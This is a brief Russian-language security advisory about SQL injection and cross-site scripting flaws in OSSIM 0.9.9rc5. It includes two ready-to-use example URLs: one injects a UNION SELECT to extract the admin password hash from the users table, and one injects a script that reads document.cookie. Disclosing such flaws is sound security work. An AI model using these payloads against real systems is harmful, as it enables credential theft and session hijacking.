Программа: OSSIM 0.9.9rc5

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и осуществить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием modules.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта и выполнить произвольные SQL команды в базе данных приложения.

Примеры:

SQL-инъекция:

http://[host]/ossim/port/modifyportform.php?portname=ANY’%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login=’admin

XSS:

http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!—



Оставить мнение